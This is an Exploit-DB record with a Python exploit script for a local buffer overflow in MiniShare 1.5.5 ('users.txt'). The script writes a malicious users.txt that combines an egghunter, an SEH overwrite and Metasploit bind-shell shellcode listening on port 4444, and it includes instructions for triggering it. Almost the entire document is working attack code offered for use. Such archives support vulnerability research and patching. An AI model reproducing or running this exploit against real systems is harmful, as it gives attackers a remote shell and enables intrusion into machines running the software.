MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)

EDB-ID:

15575

CVE:

N/A


Author:

0v3r

Type:

local


Platform:

Windows

Date:

2010-11-19


# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# Just rewrote the exploit using egghunter to inject a bind shell payload 
# Bug found by Chris Gabriel credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe

egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # EGG w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com 
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
"\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
"\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
"\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
"\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
"\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
"\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
"\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
"\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
"\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
"\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
"\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
"\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
"\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
"\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
"\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
"\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
"\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
"\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
"\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
"\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
"\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
"\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
"\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
"\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
"\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
"\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
"\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
"\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
"\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
"\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
"\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
"\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
"\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
"\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
"\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
"\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
"\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
"\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
"\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
"\x4f\x4e\x36\x4b\x4f\x7a\x70\x43")

nops     = "\x90" * (386 - len(egghunter))
morenops = "\x90" * 32             # need enough NOPs to overwrite the first instance of the egg
seh      = "\xE7\x13\x40\x00"      # POP POP RET
nseh     = "\xeb\xc0\x90\x90"      # short jump 64 bytes
egg      = "w00tw00t"              # the key the egghunter looks for

buff     = nops  + egghunter  +  nseh + seh  + morenops + egg + shellcode

#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]

try:
 	f = open("users.txt",'w')
	f.write(buff)
	f.close()

	print "\n"	
	print "\t---------------------------------------------------------------------------------"
	print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
	print "\t---------------------------------------------------------------------------------"
	print "\n"
 
	print "\t- File 'users.txt' created..."
	print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" 
except:
	print "\t-Oooops! Can't write file 'users.txt'...\n"